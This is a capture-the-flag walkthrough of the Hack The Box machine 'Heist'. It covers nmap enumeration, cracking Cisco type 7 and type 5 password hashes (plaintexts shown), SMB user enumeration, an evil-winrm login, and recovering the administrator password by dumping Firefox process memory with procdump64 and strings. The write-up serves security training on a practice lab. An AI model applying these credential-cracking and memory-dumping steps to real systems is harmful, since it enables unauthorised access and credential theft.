Heist (Easy)
Enumeration
Nmap
nmap -sC -sV -oA nmap/10.10.10.149 10.10.10.149
Nmap scan report for 10.10.10.149
Host is up (0.11s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-07-09T16:24:17
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jul 9 12:24:52 2021 -- 1 IP address (1 host up) scanned in 72.60 seconds
# Nmap 7.91 scan initiated Fri Jul 9 12:47:56 2021 as: nmap -vv --reason -Pn -A --osscan-guess --version-all -p- -oN /home/kali/Boxes/Hackthebox/Hiest/results/10.10.10.149/scans/_full_tcp_nmap.txt -oX /home/kali/Boxes/Hackthebox/Hiest/results/10.10.10.149/scans/xml/_full_tcp_nmap.xml 10.10.10.149
Nmap scan report for 10.10.10.149
Host is up, received user-set (0.090s latency).
Scanned at 2021-07-09 12:47:57 EDT for 350s
Not shown: 65530 filtered ports
Reason: 65530 no-responses
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Microsoft IIS httpd 10.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open msrpc syn-ack Microsoft Windows RPC
445/tcp open microsoft-ds? syn-ack
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49669/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 20087/tcp): CLEAN (Timeout)
| Check 2 (port 48515/tcp): CLEAN (Timeout)
| Check 3 (port 25486/udp): CLEAN (Timeout)
| Check 4 (port 40753/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-07-09T16:53:10
|_ start_date: N/A
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jul 9 12:53:47 2021 -- 1 IP address (1 host up) scanned in 350.69 seconds
As usual, I will check port 80 and port 445
Port 80

We can see a page like this and we are able to login as guest.

When we click the attachment shown at user Hazard, we can see this

Upon researching, we know that type 7 password is crack-able.
We can use this website to crack it.
Meanwhile, for the type 5 password, we can use John-The-Ripper to crack it.
Hash
Password
02375012182C1A1D751618034F36415408
Q4)sJu\Y8qz*A3?d
0242114B0E143F015F5D1E161713
$uperP@ssword
$1$pdQG$o8nrSzsGXeaduXrjlvKc91
stealth1agent
After tons of trying, finally can login to SMB using the correct pair of credentials.
smbclient --list //10.10.10.149/IPC$ -U hazard%stealth1agent

Then, I proceed to use impacket-lookupsid to find other possible users.
impacket-lookupsid hazard:stealth1agent@10.10.10.149

We can see there are user Chase and Jason.
From the nmap full tcp scan, we know that port 5985 is for win-rm that can let us to login to the system.
User
We can use user Chase and the password Q4)sJu\Y8qz*A3?d
evil-winrm -i 10.10.10.149 -u Chase -p "Q4)sJu\Y8qz*A3?d"

Got user flag !

Privilege Escalation
after some enumeration, we can see that Mozilla Firefox is installed in the machine.

From the ps command, we can see that there are few Firefox processes running.

We can use ProcDump64 to dump all the information inside the processes, then use strings to extract the information.

./procdump64.exe -accepteula -ma 6728

We can see there is a dump being created
Now we can use strings.exe to pipe the readable input to a file.
./strings.exe -accepteula firefox.exe_210802_163838.dmp > readable.txt
After that, we can download the file that we have readable strings.
When I use sublime to search for the password, it shows this

Then, we can proceed to login as administrator using the password shown.


Congratz !
Last updated
Was this helpful?